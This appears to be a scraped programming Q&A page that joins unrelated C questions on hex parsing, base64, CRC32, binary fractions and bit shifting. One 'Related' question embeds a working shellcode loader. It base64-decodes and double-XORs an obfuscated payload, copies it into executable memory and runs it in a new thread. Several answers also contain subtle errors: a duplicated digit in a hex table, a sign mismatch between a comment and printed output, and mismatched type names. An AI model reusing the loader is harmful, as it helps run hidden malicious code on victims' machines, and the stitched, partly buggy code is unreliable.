Is there a good way to parse 32 bit values out of a string? the following function does not throw the correct value and I don't know how to fix it. the value should be 170
unsigned int getvalue(const char *data, int offset)
{
unsigned int payload = 0;
for (unsigned char i = 0; i < 4; i++)
{
payload <<= 8;
payload |= data[i + offset];
}
return payload;
}
int value = 0x00aa;
unsigned char b1 = (value & 0xFF);
unsigned char b2 = ((value >> 8) & 0xFF);
unsigned char b3 = ((value >> 16) & 0xFF);
unsigned char b4 = ((value >> 24) & 0xFF);
int number = (b4 << 24) + (b3 << 16) + (b2 << 8) + b1;
printf("value is: %d\n", number); // value is: 170 correct
char payload[] = "000000aa";
int value2 = getvalue(payload, 0);
printf("value is: %dn", value2); // value is: 808464432n Not correct
if you want to convert C string containing hexadecimal number) to its integer value:
unsigned long long conv(const char *str)
{
const char digits[] = "01234567890ABCDEF";
unsigned long long result = 0;
char *ref;
while(*str)
{
result *= 16;
ref = strchr(digits, toupper((unsigned char)*str));
if(ref)
{
result += ref - digits;
}
else
{
/* error handling */
}
str++;
}
return result
}
The digits in the C string are ASCII representation of the character representing the letter or digit. '0' is not represented in the char array by zero but 0x30.
Change your getvalue to
unsigned int getvalue(const char *data, int offset)
{
unsigned int payload = 0;
for (unsigned char i = 0; i < 8; i++)
{
payload <<= 4;
if (data[i + offset] >= 'a') {
payload |= (data[i + offset] - 97) + 10;
} else if (data[i + offset] >= 'A') {
payload |= (data[i + offset] - 65) + 10;
} else {
payload |= (data[i + offset] - 48);
}
}
return payload;
}
Each hex value occupies 4 bits, hence << 4
Each char in the string is in its ASCII code, hence the subtraction.
ASCII value of 'a' is 97, but the decimal value must be 10, so the expression will be 'a' - 97 + 10
There is no need to reinvent the wheel. There is a library function to do this: strtol.
#include <stdlib.h>
unsigned int getvalue(const char *data, int offset)
{
char *end;
long payload = strtol(&data[offset],&end,16);
if (*end || payload < 0 || payload > UINT_MAX) {
/* error handling */
}
return (unsigned int)payload;
}
Related
I am trying to create a shellcode by integrating XOR encryption and Base64 encoding. However, I have a problem. Base64 decoder that I found outputs char array but I need unsigned char array because all the rest of the algorithm is created for unsigned char array. I added my code below. Can you suggest a solution?
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include "windows.h"
/* ---- Base64 Encoding/Decoding Table --- */
char b64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
void b64_encode(char *clrstr, char *b64dst);
void decodeblock(unsigned char in[], char *clrstr);
void b64_decode(char *b64src, char *clrdst);
void encodeblock( unsigned char in[], char b64str[], int len );
int main() {
PVOID lclbuff;
HANDLE thrd;
int i;
//mysrc, first, encrypted by using key1 with XOR and again encrypted by using key2 with XOR. Then encoded with base64. Therefore, I need to reverse these steps.
char mysrc[] = "XHhmOFx4NTZceDgzXHhmMFx4ZTFceGU1XHhkZlx4MGNceDEwXHgxOFx4NGRceDQyXHg0OVx4NDlceDRiXHg1MVx4NDFceDQ5XHgyOVx4YzdceDYxXHg1Nlx4OGJceDQ2XHg3MVx4NDVceDk0XHg1ZVx4MDhceDUwXHg4N1x4NDFceDI4XHg1MVx4OTJceDcyXHg0N1x4NDlceDE3XHhhMlx4NGVceDU0XHg0ZFx4MjVceGQ4XHg0NVx4MmVceGNjXHhiY1x4MjRceDZkXHg2Zlx4MGFceDM1XHgzOVx4NDFceGQ2XHhjOFx4MTVceDU0XHgwNVx4ZGZceGUyXHhmOVx4NDNceDRjXHg0ZVx4NDRceDliXHg0YVx4MmNceDk4XHg0YVx4MjVceDUxXHgwMVx4YzdceDhhXHg5OFx4OWRceDA0XHgxZVx4MDBceDVjXHg5NFx4Y2RceDZiXHg2Ylx4NThceDE5XHhkY1x4NDNceDgzXHg1MVx4MDFceDQ0XHg5Y1x4NDFceDM4XHg1Y1x4MDVceGNlXHhlM1x4NDJceDU5XHhmMlx4ZDZceDRkXHg5Ylx4MmNceDg0XHg1Ylx4MDlceGNmXHg1NFx4MzFceGRlXHg0OVx4MjlceGQ1XHhhOFx4NWZceGMxXHhkZFx4MWNceDRjXHgxZVx4Y2RceDI4XHhmOFx4NzlceGUyXHg0NFx4MWFceDU1XHgyNFx4MWZceDQ0XHgyMVx4YzRceDcxXHhjNlx4NThceDUwXHg5YVx4NGRceDNiXHg0NVx4MTFceGM4XHg2YVx4NTJceDgzXHgxNVx4NTFceDQ0XHg5Y1x4NDFceDA0XHg1Y1x4MDVceGNlXHg0MVx4OWZceDE1XHg4NVx4NTdceDBkXHhjMFx4NTlceDU0XHg1Mlx4NTBceDQ3XHg0MFx4NWFceDU2XHg1OVx4NTlceDRjXHg0NVx4NDRceDQ4XHg5N1x4ZmRceDJkXHg1ZVx4NWVceGVmXHhmOFx4NTRceDUyXHg1MVx4NDNceDUxXHg4Ylx4MDVceGU4XHg0Zlx4ZWFceGZiXHhlMVx4NWRceDVkXHhhZlx4N2FceDZjXHgzZVx4NGZceDJiXHgzZVx4MTNceDA4XHg1OFx4NGZceDQ5XHg5ZVx4ZTdceDUwXHg5NFx4ZThceGJlXHgwMVx4MTRceDExXHg0NFx4OTZceGU5XHg1OVx4YTRceDBlXHgxM1x4MmRceDYyXHgxM1x4MDBceDE1XHgwNVx4NTlceDQxXHg0ZFx4OTdceGU0XHg1OFx4OThceGZjXHg1ZVx4YjZceDVjXHg2Zlx4MmFceDE0XHhmN1x4Y2NceDU1XHg4OVx4ZmRceDY5XHgxOVx4MTRceDA0XHgxZVx4NTlceDU1XHhhYlx4MjRceDlmXHg2N1x4MTBceGU3XHhkOVx4NDNceDU4XHg1NFx4MjhceGM5XHg1YVx4MzBceGQ4XHg1ZFx4ZmJceGRlXHg0OFx4OWRceGQzXHg0NVx4ZTBceGNjXHg1OFx4OTFceGNkXHg1Mlx4YjJceGYzXHgxNlx4ZGZceGY3XHhmZVx4Y2RceDVkXHg4ZFx4ZDlceDZhXHgwNFx4NTBceDU1XHg1M1x4ODVceGYyXHg1MFx4ODVceGVhXHg0OVx4YTNceDgwXHhhNVx4NjNceDYwXHhlN1x4YzBceDRjXHg5Zlx4YzRceDU0XHgxM1x4MGRceDFmXHg0NVx4YThceDdiXHg2MVx4NzdceDA4XHgxOVx4MTlceDAwXHgxN1x4NDBceDQ4XHg1NFx4NTRceDU2XHg4OVx4ZjZceDQ2XHg1YVx4NDhceDQxXHgyMVx4ZDhceDY2XHgxZVx4NTFceDU4XHg0OVx4ZTJceGViXHg2N1x4ZGZceDUxXHgyMFx4NGFceDAxXHgxNVx4NTlceDgwXHg1Ylx4MjhceDA4XHhkZVx4MGNceDdiXHg0MFx4OTBceGZmXHg1Nlx4NDdceDQwXHg0OFx4NTRceDU0XHg1Zlx4NTBceDVkXHhlZVx4Y2RceDVlXHg1Y1x4NTlceGU3XHhjNFx4NWVceDgxXHhkOFx4NTVceDg5XHhkNlx4NDBceGEyXHg2Y1x4YzhceDIxXHg4Nlx4ZWJceGM0XHg0NVx4MmVceGRlXHg1OFx4ZTdceGM2XHg5OFx4MDZceDU4XHhhM1x4MDhceDkwXHgxY1x4NzhceGVhXHhkMVx4YTVceGYwXHhhMVx4YjNceDViXHg1ZVx4YjZceGI2XHg4ZFx4YjFceDhlXHhmN1x4Y2NceDUxXHg4M1x4ZDNceDI5XHgyNFx4MTNceDc4XHgxNFx4ODBceGVmXHhmMVx4NzhceDFhXHhiN1x4NTdceDBiXHg3ZVx4N2NceDYyXHgxOVx4NDBceDQxXHg5ZVx4ZGJceGU3XHhjMA==";
char myb64[1840];
unsigned char nw[1840];
b64_decode(mysrc, myb64);
printf("%s\n", myb64); // This gives following and true output: \xf8\x56\x83\xf0\xe1\xe5\xdf\x0c\x10\x18...
//However, It must reside inside an unsigned char array, as occurs in the output above.
//The output above must be turned into unsigned char array which is 'nw'. What can I do?
char key1[] = "elma";
char key2[] = "armut";
for(i=0; i<sizeof(nw)-1; i++){
nw[i]^=key2[i % strlen(key2)];
}
for(i=0; i<sizeof(nw)-1; i++){
nw[i]^=key1[i % strlen(key1)];
}
lclbuff = VirtualAlloc(NULL, sizeof(nw), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE);
CopyMemory(lclbuff, nw, sizeof(nw));
thrd = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)lclbuff, NULL, 0, NULL);
WaitForSingleObject(thrd, INFINITE);
return 0;
}
// The functions below are only needed to base64 encoding/decoding. Therefore, we can pass them.
/* encode - base64 encode a stream, adding padding if needed */
void b64_encode(char *clrstr, char *b64dst) {
unsigned char in[3];
int i, len = 0;
int j = 0;
b64dst[0] = '\0';
while(clrstr[j]) {
len = 0;
for(i=0; i<3; i++) {
in[i] = (unsigned char) clrstr[j];
if(clrstr[j]) {
len++; j++;
}
else in[i] = 0;
}
if( len ) {
encodeblock( in, b64dst, len );
}
}
}
/* decodeblock - decode 4 '6-bit' characters into 3 8-bit binary bytes */
void decodeblock(unsigned char in[], char *clrstr) {
unsigned char out[4];
out[0] = in[0] << 2 | in[1] >> 4;
out[1] = in[1] << 4 | in[2] >> 2;
out[2] = in[2] << 6 | in[3] >> 0;
out[3] = '\0';
strncat(clrstr, out, sizeof(out));
}
void b64_decode(char *b64src, char *clrdst) {
int c, phase, i;
unsigned char in[4];
char *p;
clrdst[0] = '\0';
phase = 0; i=0;
while(b64src[i]) {
c = (int) b64src[i];
if(c == '=') {
decodeblock(in, clrdst);
break;
}
p = strchr(b64, c);
if(p) {
in[phase] = p - b64;
phase = (phase + 1) % 4;
if(phase == 0) {
decodeblock(in, clrdst);
in[0]=in[1]=in[2]=in[3]=0;
}
}
i++;
}
}
/* encodeblock - encode 3 8-bit binary bytes as 4 '6-bit' characters */
void encodeblock( unsigned char in[], char b64str[], int len ) {
unsigned char out[5];
out[0] = b64[ in[0] >> 2 ];
out[1] = b64[ ((in[0] & 0x03) << 4) | ((in[1] & 0xf0) >> 4) ];
out[2] = (unsigned char) (len > 1 ? b64[ ((in[1] & 0x0f) << 2) |
((in[2] & 0xc0) >> 6) ] : '=');
out[3] = (unsigned char) (len > 2 ? b64[ in[2] & 0x3f ] : '=');
out[4] = '\0';
strncat(b64str, out, sizeof(out));
}
I am writting a base64 encoder and decoder and have it almost completly functional, I just need to be able to pad the encoded data with equal signs if the number of input bytes does not round out to a multiple of 3. I am relativly new to C and am not sure how I would detect the number of bytes or pad the output accordingly. This is what I have so far
void encode(char* src, char* dest) {
char base64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
unsigned char first = (src[0] >> 2);
unsigned char second = (src[0] << 4) | (src[1] >> 4);
second = (second << 2);
second = (second >> 2);
unsigned char third = (src[1] << 2) | (src[2] >> 6);
third = (third << 2);
third = (third >> 2);
unsigned char fourth = (src[2]);
fourth = (fourth << 2);
fourth = (fourth >> 2);
dest[0] = base64[first];
dest[1] = base64[second];
dest[2] = base64[third];
dest[3] = base64[fourth];
}
And my decoder method...
void decode(char* src, char* dest) {
char base64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
int i;
int j;
int index;
for(i = 0; i < 4; i++) {
index = 0;
for(j = 0; j < 64; j++) {
if (src[i] == base64[j]) {
src[i] = index;
} else {
index++;
}
}
}
char first = (src[0] << 2) | (src[1] >> 4);
char second = (src[1] << 4) | (src[2] >> 2);
char third = (src[2] << 6) | (src[3]);
dest[0] = first;
dest[1] = second;
dest[2] = third;
}
If this is not enough and I need to also provide the rest of my code I can do so.
I found this CRC32 implementation on the internet, little bit changed it, but I can't get it to work. I initialize it and update it on every byte I get from input, but the hash I get is not what it should be...
typedef struct {
unsigned short xor;
} xor_context;
void crc32_init(crc32_context *context) {
context->crc = 0xFFFFFFFF;
}
void crc32_update(crc32_context *context, unsigned char byte) {
uint32_t crc, mask;
crc = context->crc;
crc = crc ^ byte;
for (int j = 7; j >= 0; j--) { // Do eight times.
mask = -(crc & 1);
crc = (crc >> 1) ^ (0xEDB88320 & mask);
}
context->crc = ~crc;
}
This one is original
unsigned int crc32b(unsigned char *message) {
int i, j;
unsigned int byte, crc, mask;
i = 0;
crc = 0xFFFFFFFF;
while (message[i] != 0) {
byte = message[i]; // Get next byte.
crc = crc ^ byte;
for (j = 7; j >= 0; j--) { // Do eight times.
mask = -(crc & 1);
crc = (crc >> 1) ^ (0xEDB88320 & mask);
}
i = i + 1;
}
return ~crc;
}
//typedef struct {
// unsigned short xor;
//} xor_context;//--> Not sure what part this plays in the code!
void crc32_init(crc32_context *context) {
context->crc = 0xFFFFFFFF;
}
void crc32_update(crc32_context *context, unsigned char byte) {
uint32_t crc, mask;
crc = context->crc;
crc = crc ^ byte;
for (int j = 7; j >= 0; j--) { // Do eight times.
mask = -(crc & 1);
crc = (crc >> 1) ^ (0xEDB88320 & mask);
}
//context->crc = ~crc; //<-- Don't perform for every byte.
context->crc = crc; //EDIT: Forgot this!
}
//Completes the check.
uint32_t crc32_complete(crc32_context *context){
return ~context->crc;
}
I was refreshing on binary and floats and I run into the following example:
0.1 is represented as: 0.0001100110011001100110011[0011] with the part in the brackets repeating.
If we round up this representation we get:
x = 0.00011001100110011001101 (0.10000002384185791015625 in decimal).
The difference x-0.1 has the binary representation:
0.0000000000000000000000000[1100] which is (0.00000002384185791015625 in decimal).
Now how can this value be expressed as a fraction of 2^x* 1/10?
I have read that it is basically 2^-22*(1/10) but I can't see how we can derive this. Any help?
Note: The numbers are rounded to 23 bits (but the 1 in the x-0.1 example is in the 25th)
Update:
My question is not how 1/10 is represented.
But how from the bit string 0.0000000000000000000000000[1100] we can express it in a "human" format i.e. in decimal. In this case that it was 2^-22*(1/10)
Use the property that an n digit binary number , repeated, has the value of the
pattern *= (1 << BitWidth)/ ((1 << BitWidth) - 1);
The proceed to simplify the fraction.
unsigned gcd(unsigned a, unsigned b) {
if (b == 0)
return a;
else
return gcd(b, a % b);
}
// Print result & return NULL on success, else point to problem in input.
const char *Cratylus_s(const char *src) {
// parse the input
const char *s = src;
while (*s == '0')
s++;
if (*s != '.') {
return s;
}
s++;
const char *rp = s; // radix point
while (*s == '0')
s++;
int offset = s - rp;
if (*s != '[') {
return s;
}
s++;
unsigned bin = 0;
unsigned pow2 = 0;
while (*s == '0' || *s == '1') {
bin = bin * 2 + *s - '0';
pow2++;
s++;
}
if (*s != ']' || *++s != '\0') {
return s;
}
// multiply `bin` by (1 << pow2)/((1 << pow2 - 1)
unsigned num = bin * (1 << pow2);
unsigned den = (1 << pow2) - 1;
const char *format = "2^%d*(%u/%u)\n";
printf(format, offset + pow2, num, den); // 2^29*(192/15)
// simplify
unsigned common = gcd(num, den);
num /= common;
den /= common;
printf(format, offset + pow2, num, den); // 2^29*(64/5)
// find powers of 10
for (unsigned d = den; d && d % 5 == 0; d /= 5) {
num *= 2;
den *= 2;
}
// find powers of 2
for (unsigned n = num; n && n % 2 == 0; n /= 2) {
num /= 2;
offset--;
}
printf(format, offset + pow2, num, den); // 2^-22*(1/10)
return NULL;
}
void Cratylus_test(const char *s) {
printf("'%s'\n", s);
const char *t = Cratylus_s(s);
printf("'%s'\n", t ? t : "OK");
}
int main(void) {
Cratylus_test("0.0000000000000000000000000[1100]");
Cratylus_test("0.000000000000000[0110]");
return 0;
}
'0.0000000000000000000000000[1100]'
2^29*(192/15)
2^29*(64/5)
2^22*(1/10)
'OK'
'0.000000000000000[0110]'
2^19*(96/15)
2^19*(32/5)
2^13*(1/10)
'OK'
Usually bit operations are done in smaller data width such as int, unsigned int or wchar_t. Assuming we want to use the bit strings in a longer format, how to shift, get and set bits for bits in char string?
One way may be to divide and conquer using the conventional method, but how do we ensure the bit carry over?
Given
#define numberOfState 2000 // number of bits
#define numberOfBitsIn1Byte 8
char* record;
int numberOfCharRequiredToRepresentBits =
ceil(((float)numberOfState/(float)numberOfBitsIn1Byte));
record = (char*) malloc(sizeof(char)*numberOfCharRequiredToRepresentBits);
// record = "NAXHDKAN552ajdasdadNDfadsEBEAfA8gda5214S";
// optional : initialization by doing the set bit according to
// input from files. After which, do free(record);
How may we conduct bit operations such as to
i. shift the *record
ii. get bits from a specific bit position in *record
iii. set bits from a specific bit position in *record
Please have a try with following code:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int isLittleEndian = 1;
void checkEndian(void)
{
union
{
short inum;
char c[sizeof(short)];
} un;
un.inum=0x0102;
if(un.c[0]==1 && un.c[1]==2)
{
printf("big_endian.\n");
isLittleEndian = 0;
}
else if(un.c[0]==2 && un.c[1]==1)
{
printf("little_endian.\n");
isLittleEndian = 1;
}
}
void shift_L(char *src, char * dst, int len, int n)
{
int shiftBytes = n/8;
int shiftBits = n%8;
memset(dst, 0, len);
memcpy(dst, src + shiftBytes, len - shiftBytes);
if (shiftBits)
{
int i = 0;
unsigned short tmp = 0;
for ( i = 0; i < len; i++)
{
if (isLittleEndian)
{
tmp = *(dst+i) << 8 | *(dst+i+1);
tmp <<= shiftBits;
*(dst+i) = *((char *)&tmp + 1);
}
else
{
tmp = *(short *)(dst+i);
tmp <<= shiftBits;
*(dst+i) = *((char *)&tmp);
}
}
}
}
void shift_R(char *src, char * dst, int len, int n)
{
int shiftBytes = n/8;
int shiftBits = n%8;
memset(dst, 0, len);
memcpy(dst + shiftBytes, src, len - shiftBytes);
if (shiftBits)
{
int i = 0;
unsigned short tmp = 0;
for ( i = len -1; i >= 0; i--)
{
if (isLittleEndian)
{
tmp = *(dst+i-1) << 8 | *(dst+i);
tmp >>= shiftBits;
*(dst+i) = *((char *)&tmp);
}
else
{
tmp = *(short *)(dst+i-1);
tmp >>= shiftBits;
*(dst+i) = *((char *)&tmp+1);
}
}
}
}
int getBit(char *src, int n)
{
unsigned char tmp = *(src + n/8);
unsigned char mask = (0x1 << (8 - n%8 - 1));
int bit = 0;
bit = (tmp & mask) > 0;
printf("%d", bit);
}
void setBit(char *src, int n, int bit)
{
unsigned char * pTmp = src + n/8;
unsigned char mask = (0x1 << (8 - n%8 - 1));
if (bit)
{
*pTmp |= mask;
}
else
{
*pTmp &= ~mask;
}
}
void dumpBin(unsigned char *src, int len)
{
int i = 0;
int j = 0;
unsigned char mask = 0;
for ( i = 0; i < len; i++)
{
for ( j = 0; j < 8; j++)
{
mask = 0x1 << 8 - j - 1;
printf("%d",(*(src + i) & mask) > 0);
}
}
}
void main()
{
char *record = "NAXHDKAN552ajdasdadNDfadsEBEAfA8gda5214S";
//char *record = "NAXHDKA";
int recordLen = strlen(record);
char * buffer = NULL;
int i = 0;
checkEndian();
recordLen = recordLen + recordLen%2;
buffer = malloc(recordLen);
memcpy(buffer, record, recordLen);
printf("\n input bit stream:\n");
dumpBin(buffer, recordLen);
printf("\n bit stream from getBit:\n");
for ( i = 0; i < recordLen*8; i++)
{
getBit(buffer, i);
}
setBit(buffer, 8, 1);
setBit(buffer, 9, 0);
setBit(buffer, 10, 1);
setBit(buffer, 11, 1);
printf("\n bit stream after setBit:\n");
dumpBin(buffer, recordLen);
shift_L(record, buffer, recordLen, 1);
printf("\n bit stream after shift_L:\n");
dumpBin(buffer, recordLen);
shift_R(record, buffer, recordLen, 9);
printf("\n bit stream after shift_R:\n");
dumpBin(buffer, recordLen);
printf("\n");
free(buffer);
}
Your bitstream is essentially an array of char. So, to perform these operations you work on these char elements.
i. The shifting operation depends on the number of bits you want to shift.
If the number is a multiple of 8, it is pretty straightforward, you just copy the elements right of left as many bytes as the number is a multiple of 8.
If the number is less than 8, you perform the operation on every element of the array, but you need to or the overflowing bits of the previous element. For example, in left shift, element i must incorporate the overflowing bits of element i+1, and on right shift, the overflowing bits of element i-1.
Any other number of bits you want to shift can be achieved by a combination of these two actions. For example, a left shift by 18 is a shift by 16 followed by a shift by 2.
In any case, you need to be careful on which side of the bitstring you start, so that you do not lose data.
ii. In order to get the n-th bit of the bitstream, you access the element with index n/8 (integer division) and get the n%8 bit from it.
iii. Pretty much the same as ii.